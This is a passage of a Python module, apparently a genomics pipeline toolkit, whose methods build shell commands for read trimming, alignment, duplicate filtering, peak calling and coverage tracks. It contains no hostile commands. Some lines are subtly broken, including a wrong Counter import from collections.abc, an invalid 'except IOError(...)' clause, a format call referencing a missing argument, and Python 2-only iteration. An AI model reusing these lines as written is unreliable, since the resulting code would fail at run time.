within which the sample's output folder lives.\n :param str sample_name: Sample name, which determines subfolder within\n output_dir for the fastqc files.\n :return list[str]: Pair of commands, to run fastqc and then move the files to\n their intended destination based on sample name.\n \"\"\"\n cmds = list()\n initial = os.path.splitext(os.path.basename(input_bam))[0]\n cmd1 = self.fastqc(input_bam, output_dir)\n cmds.append(cmd1)\n cmd2 = \"if [[ ! -s {1}_fastqc.html ]]; then mv {0}_fastqc.html {1}_fastqc.html; mv {0}_fastqc.zip {1}_fastqc.zip; fi\".format(\n os.path.join(output_dir, initial), os.path.join(output_dir, sample_name)\n )\n cmds.append(cmd2)\n return cmds\n\n def samtools_index(self, bam_file):\n \"\"\"Index a bam file.\"\"\"\n cmd = self.tools.samtools + \" index {0}\".format(bam_file)\n return cmd\n\n def slurm_header(\n self,\n job_name,\n output,\n queue=\"shortq\",\n n_tasks=1,\n time=\"10:00:00\",\n cpus_per_task=8,\n mem_per_cpu=2000,\n nodes=1,\n user_mail=\"\",\n mail_type=\"end\",\n ):\n cmd = \"\"\" #!/bin/bash\n #SBATCH --partition={0}\n #SBATCH --ntasks={1}\n #SBATCH --time={2}\n\n #SBATCH --cpus-per-task={3}\n #SBATCH --mem-per-cpu={4}\n #SBATCH --nodes={5}\n\n #SBATCH --job-name={6}\n #SBATCH --output={7}\n\n #SBATCH --mail-type={8}\n #SBATCH --mail-user={9}\n\n # Start running the job\n hostname\n date\n\n \"\"\".format(\n queue,\n n_tasks,\n time,\n cpus_per_task,\n mem_per_cpu,\n nodes,\n job_name,\n output,\n mail_type,\n user_mail,\n )\n\n return cmd\n\n def slurm_footer(self):\n return \" date\"\n\n def slurm_submit_job(self, job_file):\n return os.system(\"sbatch %s\" % job_file)\n\n def remove_file(self, file_name):\n return \"rm {0}\".format(file_name)\n\n def move_file(self, old, new):\n return \"mv {0} {1}\".format(old, new)\n\n def preseq_curve(self, bam_file, output_prefix):\n return \"\"\"\n preseq c_curve -B -P -o {0}.yield.txt {1}\n \"\"\".format(\n output_prefix, bam_file\n )\n\n def preseq_extrapolate(self, bam_file, output_prefix):\n return \"\"\"\n preseq lc_extrap -v -B -P -e 1e+9 -o {0}.future_yield.txt {1}\n \"\"\".format(\n output_prefix, bam_file\n )\n\n def preseq_coverage(self, bam_file, output_prefix):\n return \"\"\"\n preseq gc_extrap -o {0}.future_coverage.txt {1}\n \"\"\".format(\n output_prefix, bam_file\n )\n\n def trimmomatic(\n self,\n input_fastq1,\n output_fastq1,\n cpus,\n adapters,\n log,\n input_fastq2=None,\n output_fastq1_unpaired=None,\n output_fastq2=None,\n output_fastq2_unpaired=None,\n ):\n PE = False if input_fastq2 is None else True\n pe = \"PE\" if PE else \"SE\"\n cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.trimmomatic\n cmd += \" {0} -threads {1} -trimlog {2} {3}\".format(pe, cpus, log, input_fastq1)\n if PE:\n cmd += \" {0}\".format(input_fastq2)\n cmd += \" {0}\".format(output_fastq1)\n if PE:\n cmd += \" {0} {1} {2}\".format(\n output_fastq1_unpaired, output_fastq2, output_fastq2_unpaired\n )\n cmd += \" ILLUMINACLIP:{0}:1:40:15:8:true\".format(adapters)\n cmd += \" LEADING:3 TRAILING:3\"\n cmd += \" SLIDINGWINDOW:4:10\"\n cmd += \" MINLEN:36\"\n return cmd\n\n def skewer(\n self,\n input_fastq1,\n output_prefix,\n output_fastq1,\n log,\n cpus,\n adapters,\n input_fastq2=None,\n output_fastq2=None,\n ):\n \"\"\"\n Create commands with which to run skewer.\n\n :param str input_fastq1: Path to input (read 1) FASTQ file\n :param str output_prefix: Prefix for output FASTQ file names\n :param str output_fastq1: Path to (read 1) output FASTQ file\n :param str log: Path 
to file to which to write logging information\n :param int | str cpus: Number of processing cores to allow\n :param str adapters: Path to file with sequencing adapters\n :param str input_fastq2: Path to read 2 input FASTQ file\n :param str output_fastq2: Path to read 2 output FASTQ file\n :return list[str]: Sequence of commands to run to trim reads with\n skewer and rename files as desired.\n \"\"\"\n\n pe = input_fastq2 is not None\n mode = \"pe\" if pe else \"any\"\n cmds = list()\n cmd1 = self.tools.skewer + \" --quiet\"\n cmd1 += \" -f sanger\"\n cmd1 += \" -t {0}\".format(cpus)\n cmd1 += \" -m {0}\".format(mode)\n cmd1 += \" -x {0}\".format(adapters)\n cmd1 += \" -o {0}\".format(output_prefix)\n cmd1 += \" {0}\".format(input_fastq1)\n if input_fastq2 is None:\n cmds.append(cmd1)\n else:\n cmd1 += \" {0}\".format(input_fastq2)\n cmds.append(cmd1)\n if input_fastq2 is None:\n cmd2 = \"mv {0} {1}\".format(output_prefix + \"-trimmed.fastq\", output_fastq1)\n cmds.append(cmd2)\n else:\n cmd2 = \"mv {0} {1}\".format(\n output_prefix + \"-trimmed-pair1.fastq\", output_fastq1\n )\n cmds.append(cmd2)\n cmd3 = \"mv {0} {1}\".format(\n output_prefix + \"-trimmed-pair2.fastq\", output_fastq2\n )\n cmds.append(cmd3)\n cmd4 = \"mv {0} {1}\".format(output_prefix + \"-trimmed.log\", log)\n cmds.append(cmd4)\n return cmds\n\n def bowtie2_map(\n self,\n input_fastq1,\n output_bam,\n log,\n metrics,\n genome_index,\n max_insert,\n cpus,\n input_fastq2=None,\n ):\n # Admits 2000bp-long fragments (--maxins option)\n cmd = self.tools.bowtie2 + \" --very-sensitive --no-discordant -p {0}\".format(\n cpus\n )\n cmd += \" -x {0}\".format(genome_index)\n cmd += \" --met-file {0}\".format(metrics)\n if input_fastq2 is None:\n cmd += \" {0} \".format(input_fastq1)\n else:\n cmd += \" --maxins {0}\".format(max_insert)\n cmd += \" -1 {0}\".format(input_fastq1)\n cmd += \" -2 {0}\".format(input_fastq2)\n cmd += \" 2> {0} | samtools view -S -b - | samtools sort -o {1} -\".format(\n log, output_bam\n )\n return cmd\n\n def topHat_map(self, input_fastq, output_dir, genome, transcriptome, cpus):\n # TODO:\n # Allow paired input\n cmd = (\n self.tools.tophat\n + \" --GTF {0} --b2-L 15 --library-type fr-unstranded --mate-inner-dist 120\".format(\n transcriptome\n )\n )\n cmd += \" --max-multihits 100 --no-coverage-search\"\n cmd += \" --num-threads {0} --output-dir {1} {2} {3}\".format(\n cpus, output_dir, genome, input_fastq\n )\n return cmd\n\n def picard_mark_duplicates(self, input_bam, output_bam, metrics_file, temp_dir=\".\"):\n transient_file = re.sub(\"\\.bam$\", \"\", output_bam) + \".dups.nosort.bam\"\n output_bam = re.sub(\"\\.bam$\", \"\", output_bam)\n cmd1 = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd1 += \" -jar `which MarkDuplicates.jar`\"\n cmd1 += \" INPUT={0}\".format(input_bam)\n cmd1 += \" OUTPUT={0}\".format(transient_file)\n cmd1 += \" METRICS_FILE={0}\".format(metrics_file)\n cmd1 += \" VALIDATION_STRINGENCY=LENIENT\"\n cmd1 += \" TMP_DIR={0}\".format(temp_dir)\n # Sort bam file with marked duplicates\n cmd2 = self.tools.samtools + \" sort {0} {1}\".format(transient_file, output_bam)\n # Remove transient file\n cmd3 = \"if [[ -s {0} ]]; then rm {0}; fi\".format(transient_file)\n return [cmd1, cmd2, cmd3]\n\n def sambamba_remove_duplicates(self, input_bam, output_bam, cpus=16):\n cmd = self.tools.sambamba + \" markdup -t {0} -r {1} {2}\".format(\n cpus, input_bam, output_bam\n )\n return cmd\n\n def get_mitochondrial_reads(self, bam_file, output, cpus=4):\n \"\"\" \"\"\"\n tmp_bam = bam_file 
+ \"tmp_rmMe\"\n cmd1 = self.tools.sambamba + \" index -t {0} {1}\".format(cpus, bam_file)\n cmd2 = (\n self.tools.sambamba\n + \" slice {0} chrM | {1} markdup -t 4 /dev/stdin {2} 2> {3}\".format(\n bam_file, self.tools.sambamba, tmp_bam, output\n )\n )\n cmd3 = \"rm {}\".format(tmp_bam)\n return [cmd1, cmd2, cmd3]\n\n def filter_reads(\n self, input_bam, output_bam, metrics_file, paired=False, cpus=16, Q=30\n ):\n \"\"\"\n Remove duplicates, filter for >Q, remove multiple mapping reads.\n For paired-end reads, keep only proper pairs.\n \"\"\"\n nodups = re.sub(\"\\.bam$\", \"\", output_bam) + \".nodups.nofilter.bam\"\n cmd1 = (\n self.tools.sambamba\n + \" markdup -t {0} -r --compression-level=0 {1} {2} 2> {3}\".format(\n cpus, input_bam, nodups, metrics_file\n )\n )\n cmd2 = self.tools.sambamba + \" view -t {0} -f bam --valid\".format(cpus)\n if paired:\n cmd2 += ' -F \"not (unmapped or mate_is_unmapped) and proper_pair'\n else:\n cmd2 += ' -F \"not unmapped'\n cmd2 += ' and not (secondary_alignment or supplementary) and mapping_quality >= {0}\"'.format(\n Q\n )\n cmd2 += \" {0} |\".format(nodups)\n cmd2 += self.tools.sambamba + \" sort -t {0} /dev/stdin -o {1}\".format(\n cpus, output_bam\n )\n cmd3 = \"if [[ -s {0} ]]; then rm {0}; fi\".format(nodups)\n cmd4 = \"if [[ -s {0} ]]; then rm {0}; fi\".format(nodups + \".bai\")\n return [cmd1, cmd2, cmd3, cmd4]\n\n def shift_reads(self, input_bam, genome, output_bam):\n # output_bam = re.sub(\"\\.bam$\", \"\", output_bam)\n cmd = self.tools.samtools + \" view -h {0} |\".format(input_bam)\n cmd += \" shift_reads.py {0} |\".format(genome)\n cmd += \" \" + self.tools.samtools + \" view -S -b - |\"\n cmd += \" \" + self.tools.samtools + \" sort -o {0} -\".format(output_bam)\n return cmd\n\n def sort_index_bam(self, input_bam, output_bam):\n tmp_bam = re.sub(\"\\.bam\", \".sorted\", input_bam)\n cmd1 = self.tools.samtools + \" sort {0} {1}\".format(input_bam, tmp_bam)\n cmd2 = \"mv {0}.bam {1}\".format(tmp_bam, output_bam)\n cmd3 = self.tools.samtools + \" index {0}\".format(output_bam)\n return [cmd1, cmd2, cmd3]\n\n def index_bam(self, input_bam):\n cmd = self.tools.samtools + \" index {0}\".format(input_bam)\n return cmd\n\n def run_spp(self, input_bam, output, plot, cpus):\n \"\"\"\n Run the SPP read peak analysis tool.\n\n :param str input_bam: Path to reads file\n :param str output: Path to output file\n :param str plot: Path to plot file\n :param int cpus: Number of processors to use\n :return str: Command with which to run SPP\n \"\"\"\n base = \"{} {} -rf -savp\".format(self.tools.Rscript, self.tools.spp)\n cmd = base + \" -savp={} -s=0:5:500 -c={} -out={} -p={}\".format(\n plot, input_bam, output, cpus\n )\n return cmd\n\n def get_fragment_sizes(self, bam_file):\n try:\n import numpy as np\n import pysam\n except:\n return\n frag_sizes = list()\n bam = pysam.Samfile(bam_file, \"rb\")\n for read in bam:\n if bam.getrname(read.tid) != \"chrM\" and read.tlen < 1500:\n frag_sizes.append(read.tlen)\n bam.close()\n return np.array(frag_sizes)\n\n def plot_atacseq_insert_sizes(\n self, bam, plot, output_csv, max_insert=1500, smallest_insert=30\n ):\n \"\"\"\n Heavy inspiration from here:\n https://github.com/dbrg77/ATAC/blob/master/ATAC_seq_read_length_curve_fitting.ipynb\n \"\"\"\n try:\n import matplotlib\n import matplotlib.mlab as mlab\n import numpy as np\n import pysam\n from scipy.integrate import simps\n from scipy.optimize import curve_fit\n\n matplotlib.use(\"Agg\")\n import matplotlib.pyplot as plt\n except:\n print(\"Necessary 
Python modules couldn't be loaded.\")\n            return\n\n        try:\n            import seaborn as sns\n\n            sns.set_style(\"whitegrid\")\n        except:\n            pass\n\n        def get_fragment_sizes(bam, max_insert=1500):\n            frag_sizes = list()\n\n            bam = pysam.Samfile(bam, \"rb\")\n\n            for i, read in enumerate(bam):\n                if read.tlen < max_insert:\n                    frag_sizes.append(read.tlen)\n            bam.close()\n\n            return np.array(frag_sizes)\n\n        def mixture_function(x, *p):\n            \"\"\"\n            Mixture function to model four gaussian (nucleosomal)\n            and one exponential (nucleosome-free) distributions.\n            \"\"\"\n            m1, s1, w1, m2, s2, w2, m3, s3, w3, m4, s4, w4, q, r = p\n            nfr = expo(x, 2.9e-02, 2.8e-02)\n            nfr[:smallest_insert] = 0\n\n            return (\n                mlab.normpdf(x, m1, s1) * w1\n                + mlab.normpdf(x, m2, s2) * w2\n                + mlab.normpdf(x, m3, s3) * w3\n                + mlab.normpdf(x, m4, s4) * w4\n                + nfr\n            )\n\n        def expo(x, q, r):\n            \"\"\"\n            Exponential function.\n            \"\"\"\n            return q * np.exp(-r * x)\n\n        # get fragment sizes\n        frag_sizes = get_fragment_sizes(bam)\n\n        # bin\n        numBins = np.linspace(0, max_insert, max_insert + 1)\n        y, scatter_x = np.histogram(frag_sizes, numBins, density=1)\n        # get the mid-point of each bin\n        x = (scatter_x[:-1] + scatter_x[1:]) / 2\n\n        # Parameters are empirical, need to check\n        paramGuess = [\n            200,\n            50,\n            0.7,  # gaussians\n            400,\n            50,\n            0.15,\n            600,\n            50,\n            0.1,\n            800,\n            55,\n            0.045,\n            2.9e-02,\n            2.8e-02,  # exponential\n        ]\n\n        try:\n            popt3, pcov3 = curve_fit(\n                mixture_function,\n                x[smallest_insert:],\n                y[smallest_insert:],\n                p0=paramGuess,\n                maxfev=100000,\n            )\n        except:\n            print(\"Nucleosomal fit could not be found.\")\n            return\n\n        m1, s1, w1, m2, s2, w2, m3, s3, w3, m4, s4, w4, q, r = popt3\n\n        # Plot\n        plt.figure(figsize=(12, 12))\n\n        # Plot distribution\n        plt.hist(frag_sizes, numBins, histtype=\"step\", ec=\"k\", normed=1, alpha=0.5)\n\n        # Plot nucleosomal fits\n        plt.plot(x, mlab.normpdf(x, m1, s1) * w1, \"r-\", lw=1.5, label=\"1st nucleosome\")\n        plt.plot(x, mlab.normpdf(x, m2, s2) * w2, \"g-\", lw=1.5, label=\"2nd nucleosome\")\n        plt.plot(x, mlab.normpdf(x, m3, s3) * w3, \"b-\", lw=1.5, label=\"3rd nucleosome\")\n        plt.plot(x, mlab.normpdf(x, m4, s4) * w4, \"c-\", lw=1.5, label=\"4th nucleosome\")\n\n        # Plot nucleosome-free fit\n        nfr = expo(x, 2.9e-02, 2.8e-02)\n        nfr[:smallest_insert] = 0\n        plt.plot(x, nfr, \"k-\", lw=1.5, label=\"nucleosome-free\")\n\n        # Plot sum of fits\n        ys = mixture_function(x, *popt3)\n        plt.plot(x, ys, \"k--\", lw=3.5, label=\"fit sum\")\n\n        plt.legend()\n        plt.xlabel(\"Fragment size (bp)\")\n        plt.ylabel(\"Density\")\n        plt.savefig(plot, bbox_inches=\"tight\")\n\n        # Integrate curves and get areas under curve; each component is scaled\n        # by its own fitted weight.\n        areas = [\n            [\"fraction\", \"area under curve\", \"max density\"],\n            [\"Nucleosome-free fragments\", simps(nfr), max(nfr)],\n            [\n                \"1st nucleosome\",\n                simps(mlab.normpdf(x, m1, s1) * w1),\n                max(mlab.normpdf(x, m1, s1) * w1),\n            ],\n            [\n                \"2nd nucleosome\",\n                simps(mlab.normpdf(x, m2, s2) * w2),\n                max(mlab.normpdf(x, m2, s2) * w2),\n            ],\n            [\n                \"3rd nucleosome\",\n                simps(mlab.normpdf(x, m3, s3) * w3),\n                max(mlab.normpdf(x, m3, s3) * w3),\n            ],\n            [\n                \"4th nucleosome\",\n                simps(mlab.normpdf(x, m4, s4) * w4),\n                max(mlab.normpdf(x, m4, s4) * w4),\n            ],\n        ]\n\n        try:\n            import csv\n\n            with open(output_csv, \"w\") as f:\n                writer = csv.writer(f)\n                writer.writerows(areas)\n        except:\n            pass\n\n    # TODO: parameterize in terms of normalization factor.\n    def bam_to_bigwig(\n        self,\n        input_bam,\n        output_bigwig,\n        genome_sizes,\n        genome,\n        tagmented=False,\n        normalize=False,\n        norm_factor=1000,\n    ):\n        \"\"\"\n        Convert a BAM file to a bigWig 
file.\n\n :param str input_bam: path to BAM file to convert\n :param str output_bigwig: path to which to write file in bigwig format\n :param str genome_sizes: path to file with chromosome size information\n :param str genome: name of genomic assembly\n :param bool tagmented: flag related to read-generating protocol\n :param bool normalize: whether to normalize coverage\n :param int norm_factor: number of bases to use for normalization\n :return list[str]: sequence of commands to execute\n \"\"\"\n # TODO:\n # addjust fragment length dependent on read size and real fragment size\n # (right now it asssumes 50bp reads with 180bp fragments)\n cmds = list()\n transient_file = os.path.abspath(re.sub(\"\\.bigWig\", \"\", output_bigwig))\n cmd1 = self.tools.bedtools + \" bamtobed -i {0} |\".format(input_bam)\n if not tagmented:\n cmd1 += (\n \" \"\n + self.tools.bedtools\n + \" slop -i stdin -g {0} -s -l 0 -r 130 |\".format(genome_sizes)\n )\n cmd1 += \" fix_bedfile_genome_boundaries.py {0} |\".format(genome)\n cmd1 += (\n \" \"\n + self.tools.genomeCoverageBed\n + \" {0}-bg -g {1} -i stdin > {2}.cov\".format(\n \"-5 \" if tagmented else \"\", genome_sizes, transient_file\n )\n )\n cmds.append(cmd1)\n if normalize:\n cmds.append(\n \"\"\"awk 'NR==FNR{{sum+= $4; next}}{{ $4 = ($4 / sum) * {1}; print}}' {0}.cov {0}.cov | sort -k1,1 -k2,2n > {0}.normalized.cov\"\"\".format(\n transient_file, norm_factor\n )\n )\n cmds.append(\n self.tools.bedGraphToBigWig\n + \" {0}{1}.cov {2} {3}\".format(\n transient_file,\n \".normalized\" if normalize else \"\",\n genome_sizes,\n output_bigwig,\n )\n )\n # remove tmp files\n cmds.append(\"if [[ -s {0}.cov ]]; then rm {0}.cov; fi\".format(transient_file))\n if normalize:\n cmds.append(\n \"if [[ -s {0}.normalized.cov ]]; then rm {0}.normalized.cov; fi\".format(\n transient_file\n )\n )\n cmds.append(\"chmod 755 {0}\".format(output_bigwig))\n return cmds\n\n def add_track_to_hub(\n self, sample_name, track_url, track_hub, colour, five_prime=\"\"\n ):\n cmd1 = (\n \"\"\"echo \"track type=bigWig name='{0} {1}' description='{0} {1}'\"\"\".format(\n sample_name, five_prime\n )\n )\n cmd1 += \"\"\" height=32 visibility=full maxHeightPixels=32:32:25 bigDataUrl={0} color={1}\" >> {2}\"\"\".format(\n track_url, colour, track_hub\n )\n cmd2 = \"chmod 755 {0}\".format(track_hub)\n return [cmd1, cmd2]\n\n def link_to_track_hub(self, track_hub_url, file_name, genome):\n import textwrap\n\n db = \"org\" if genome == \"hg19\" else \"db\" # different database call for human\n genome = \"human\" if genome == \"hg19\" else genome # change hg19 to human\n html = \"\"\"\n \n \n \n \n \n \"\"\".format(\n track_hub_url=track_hub_url, genome=genome, db=db\n )\n with open(file_name, \"w\") as handle:\n handle.write(textwrap.dedent(html))\n\n def htseq_count(self, input_bam, gtf, output):\n sam = input_bam.replace(\"bam\", \"sam\")\n cmd1 = \"samtools view {0} > {1}\".format(input_bam, sam)\n cmd2 = (\n \"htseq-count -f sam -t exon -i transcript_id -m union {0} {1} > {2}\".format(\n sam, gtf, output\n )\n )\n cmd3 = \"rm {0}\".format(sam)\n return [cmd1, cmd2, cmd3]\n\n def kallisto(\n self,\n input_fastq,\n output_dir,\n output_bam,\n transcriptome_index,\n cpus,\n input_fastq2=None,\n size=180,\n b=200,\n ):\n cmd1 = (\n self.tools.kallisto\n + \" quant --bias --pseudobam -b {0} -l {1} -i {2} -o {3} -t {4}\".format(\n b, size, transcriptome_index, output_dir, cpus\n )\n )\n if input_fastq2 is None:\n cmd1 += \" --single {0}\".format(input_fastq)\n else:\n cmd1 += \" {0} 
{1}\".format(input_fastq, input_fastq2)\n cmd1 += \" | \" + self.tools.samtools + \" view -Sb - > {0}\".format(output_bam)\n cmd2 = self.tools.kallisto + \" h5dump -o {0} {0}/abundance.h5\".format(\n output_dir\n )\n return [cmd1, cmd2]\n\n def genome_wide_coverage(self, input_bam, genome_windows, output):\n cmd = self.tools.bedtools + \" coverage -counts -abam {0} -b {1} > {2}\".format(\n input_bam, genome_windows, output\n )\n return cmd\n\n def calc_frip(self, input_bam, input_bed, threads=4):\n \"\"\"\n Calculate fraction of reads in peaks.\n\n A file of with a pool of sequencing reads and a file with peak call\n regions define the operation that will be performed. Thread count\n for samtools can be specified as well.\n\n :param str input_bam: sequencing reads file\n :param str input_bed: file with called peak regions\n :param int threads: number of threads samtools may use\n :return float: fraction of reads in peaks defined in given peaks file\n \"\"\"\n cmd = self.simple_frip(input_bam, input_bed, threads)\n return subprocess.check_output(cmd.split(\" \"), shell=True).decode().strip()\n\n def simple_frip(self, input_bam, input_bed, threads=4):\n cmd = \"{} view\".format(self.tools.samtools)\n cmd += \" -@ {} -c -L {}\".format(threads, input_bed)\n cmd += \" \" + input_bam\n return cmd\n\n def calculate_frip(self, input_bam, input_bed, output, cpus=4):\n cmd = self.tools.sambamba + \" depth region -t {0}\".format(cpus)\n cmd += \" -L {0}\".format(input_bed)\n cmd += \" {0}\".format(input_bam)\n cmd += \" | awk '{{sum+=$5}} END {{print sum}}' > {0}\".format(output)\n return cmd\n\n def macs2_call_peaks(\n self,\n treatment_bams,\n output_dir,\n sample_name,\n genome,\n control_bams=None,\n broad=False,\n paired=False,\n pvalue=None,\n qvalue=None,\n include_significance=None,\n ):\n \"\"\"\n Use MACS2 to call peaks.\n\n :param str | Iterable[str] treatment_bams: Paths to files with data to\n regard as treatment.\n :param str output_dir: Path to output folder.\n :param str sample_name: Name for the sample involved.\n :param str genome: Name of the genome assembly to use.\n :param str | Iterable[str] control_bams: Paths to files with data to\n regard as control\n :param bool broad: Whether to do broad peak calling.\n :param bool paired: Whether reads are paired-end\n :param float | NoneType pvalue: Statistical significance measure to\n pass as --pvalue to peak calling with MACS\n :param float | NoneType qvalue: Statistical significance measure to\n pass as --qvalue to peak calling with MACS\n :param bool | NoneType include_significance: Whether to pass a\n statistical significance argument to peak calling with MACS; if\n omitted, this will be True if the peak calling is broad or if\n either p-value or q-value is specified; default significance\n specification is a p-value of 0.001 if a significance is to be\n specified but no value is provided for p-value or q-value.\n :return str: Command to run.\n \"\"\"\n sizes = {\n \"hg38\": 2.7e9,\n \"hg19\": 2.7e9,\n \"mm10\": 1.87e9,\n \"dr7\": 1.412e9,\n \"mm9\": 1.87e9,\n }\n\n # Whether to specify to MACS2 a value for statistical significance\n # can be either directly indicated, but if not, it's determined by\n # whether the mark is associated with broad peaks. 
By default, we\n # specify a significance value to MACS2 for a mark associated with a\n # broad peak.\n if include_significance is None:\n include_significance = broad\n\n cmd = self.tools.macs2 + \" callpeak -t {0}\".format(\n treatment_bams if type(treatment_bams) is str else \" \".join(treatment_bams)\n )\n\n if control_bams is not None:\n cmd += \" -c {0}\".format(\n control_bams if type(control_bams) is str else \" \".join(control_bams)\n )\n\n if paired:\n cmd += \" -f BAMPE \"\n\n # Additional settings based on whether the marks is associated with\n # broad peaks\n if broad:\n cmd += \" --broad --nomodel --extsize 73\"\n else:\n cmd += \" --fix-bimodal --extsize 180 --bw 200\"\n\n if include_significance:\n # Allow significance specification via either p- or q-value,\n # giving preference to q-value if both are provided but falling\n # back on a default p-value if neither is provided but inclusion\n # of statistical significance measure is desired.\n if qvalue is not None:\n cmd += \" --qvalue {}\".format(qvalue)\n else:\n cmd += \" --pvalue {}\".format(pvalue or 0.00001)\n cmd += \" -g {0} -n {1} --outdir {2}\".format(\n sizes[genome], sample_name, output_dir\n )\n\n return cmd\n\n def macs2_call_peaks_atacseq(self, treatment_bam, output_dir, sample_name, genome):\n genome_sizes = {\n \"hg38\": 2.7e9,\n \"hg19\": 2.7e9,\n \"mm10\": 1.87e9,\n \"dr7\": 1.412e9,\n \"mm9\": 1.87e9,\n }\n cmd = self.tools.macs2 + \" callpeak -t {0}\".format(treatment_bam)\n cmd += \" --nomodel --extsize 147 -g {0} -n {1} --outdir {2}\".format(\n genome_sizes[genome], sample_name, output_dir\n )\n return cmd\n\n def macs2_plot_model(self, r_peak_model_file, sample_name, output_dir):\n # run macs r script\n cmd1 = \"{} {}\".format(self.tools.Rscript, r_peak_model_file)\n # move output plot to sample dir\n cmd2 = \"mv {0}/{1}_model.pdf {2}/{1}_model.pdf\".format(\n os.getcwd(), sample_name, output_dir\n )\n return [cmd1, cmd2]\n\n def spp_call_peaks(\n self,\n treatment_bam,\n control_bam,\n treatment_name,\n control_name,\n output_dir,\n broad,\n cpus,\n qvalue=None,\n ):\n \"\"\"\n Build command for R script to call peaks with SPP.\n\n :param str treatment_bam: Path to file with data for treatment sample.\n :param str control_bam: Path to file with data for control sample.\n :param str treatment_name: Name for the treatment sample.\n :param str control_name: Name for the control sample.\n :param str output_dir: Path to folder for output.\n :param str | bool broad: Whether to specify broad peak calling mode.\n :param int cpus: Number of cores the script may use.\n :param float qvalue: FDR, as decimal value\n :return str: Command to run.\n \"\"\"\n broad = \"TRUE\" if broad else \"FALSE\"\n cmd = (\n self.tools.Rscript\n + \" `which spp_peak_calling.R` {0} {1} {2} {3} {4} {5} {6}\".format(\n treatment_bam,\n control_bam,\n treatment_name,\n control_name,\n broad,\n cpus,\n output_dir,\n )\n )\n if qvalue is not None:\n cmd += \" {}\".format(qvalue)\n return cmd\n\n def bam_to_bed(self, input_bam, output_bed):\n cmd = self.tools.bedtools + \" bamtobed -i {0} > {1}\".format(\n input_bam, output_bed\n )\n return cmd\n\n def zinba_call_peaks(self, treatment_bed, control_bed, cpus, tagmented=False):\n fragmentLength = 80 if tagmented else 180\n cmd = self.tools.Rscript + \" `which zinba.R` -l {0} -t {1} -c {2}\".format(\n fragmentLength, treatment_bed, control_bed\n )\n return cmd\n\n def filter_peaks_mappability(self, peaks, alignability, filtered_peaks):\n cmd = self.tools.bedtools + \" intersect -wa -u -f 
1\"\n cmd += \" -a {0} -b {1} > {2} \".format(peaks, alignability, filtered_peaks)\n return cmd\n\n def homer_find_motifs(\n self,\n peak_file,\n genome,\n output_dir,\n size=150,\n length=\"8,10,12,14,16\",\n n_motifs=12,\n ):\n cmd = \"findMotifsGenome.pl {0} {1} {2}\".format(peak_file, genome, output_dir)\n cmd += \" -mask -size {0} -len {1} -S {2}\".format(size, length, n_motifs)\n return cmd\n\n def homer_annotate_pPeaks(self, peak_file, genome, motif_file, output_bed):\n cmd = \"annotatePeaks.pl {0} {1} -mask -mscore -m {2} |\".format(\n peak_file, genome, motif_file\n )\n cmd += \"tail -n +2 | cut -f 1,5,22 > {3}\".format(output_bed)\n return cmd\n\n def center_peaks_on_motifs(\n self, peak_file, genome, window_width, motif_file, output_bed\n ):\n cmd = \"annotatePeaks.pl {0} {1} -size {2} -center {3} |\".format(\n peak_file, genome, window_width, motif_file\n )\n cmd += \" awk -v OFS='\\t' '{print $2, $3, $4, $1, $6, $5}' |\"\n cmd += \"\"\" awk -v OFS='\\t' -F '\\t' '{ gsub(\"0\", \"+\", $6) ; gsub(\"1\", \"-\", $6) ; print }' |\"\"\"\n cmd += \" fix_bedfile_genome_boundaries.py {0} | sortBed > {1}\".format(\n genome, output_bed\n )\n return cmd\n\n def get_read_type(self, bam_file, n=10):\n \"\"\"\n Gets the read type (single, paired) and length of bam file.\n :param str bam_file: Bam file to determine read attributes.\n :param int n: Number of lines to read from bam file.\n :return str, int: tuple of read type and read length\n \"\"\"\n\n from collections.abc import Counter\n\n try:\n p = subprocess.Popen(\n [self.tools.samtools, \"view\", bam_file], stdout=subprocess.PIPE\n )\n # Count paired alignments\n paired = 0\n read_length = Counter()\n while n > 0:\n line = p.stdout.next().split(\"\\t\")\n flag = int(line[1])\n read_length[len(line[9])] += 1\n if 1 & flag: # check decimal flag contains 1 (paired)\n paired += 1\n n -= 1\n p.kill()\n except IOError(\"Cannot read provided bam file.\") as e:\n raise e\n # Get most abundant read read_length\n read_length = sorted(read_length)[-1]\n # If at least half is paired, return True\n if paired > (n / 2.0):\n return \"PE\", read_length\n else:\n return \"SE\", read_length\n\n def parse_bowtie_stats(self, stats_file):\n \"\"\"\n Parses Bowtie2 stats file, returns series with values.\n :param str stats_file: Bowtie2 output file with alignment statistics.\n \"\"\"\n import pandas as pd\n\n stats = pd.Series(\n index=[\n \"readCount\",\n \"unpaired\",\n \"unaligned\",\n \"unique\",\n \"multiple\",\n \"alignmentRate\",\n ]\n )\n try:\n with open(stats_file) as handle:\n content = handle.readlines() # list of strings per line\n except:\n return stats\n # total reads\n try:\n line = [\n i for i in range(len(content)) if \" reads; of these:\" in content[i]\n ][0]\n stats[\"readCount\"] = re.sub(\"\\D.*\", \"\", content[line])\n if 7 > len(content) > 2:\n line = [\n i\n for i in range(len(content))\n if \"were unpaired; of these:\" in content[i]\n ][0]\n stats[\"unpaired\"] = re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n else:\n line = [\n i\n for i in range(len(content))\n if \"were paired; of these:\" in content[i]\n ][0]\n stats[\"unpaired\"] = stats[\"readCount\"] - int(\n re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n )\n line = [i for i in range(len(content)) if \"aligned 0 times\" in content[i]][\n 0\n ]\n stats[\"unaligned\"] = re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n line = [\n i for i in range(len(content)) if \"aligned exactly 1 time\" in content[i]\n ][0]\n stats[\"unique\"] 
= re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n line = [i for i in range(len(content)) if \"aligned >1 times\" in content[i]][\n 0\n ]\n stats[\"multiple\"] = re.sub(\"\\D\", \"\", re.sub(\"\\(.*\", \"\", content[line]))\n line = [\n i for i in range(len(content)) if \"overall alignment rate\" in content[i]\n ][0]\n stats[\"alignmentRate\"] = re.sub(\"\\%.*\", \"\", content[line]).strip()\n except IndexError:\n pass\n return stats\n\n def parse_duplicate_stats(self, stats_file):\n \"\"\"\n Parses sambamba markdup output, returns series with values.\n\n :param str stats_file: sambamba output file with duplicate statistics.\n \"\"\"\n import pandas as pd\n\n series = pd.Series()\n try:\n with open(stats_file) as handle:\n content = handle.readlines() # list of strings per line\n except:\n return series\n try:\n line = [\n i\n for i in range(len(content))\n if \"single ends (among them \" in content[i]\n ][0]\n series[\"single-ends\"] = 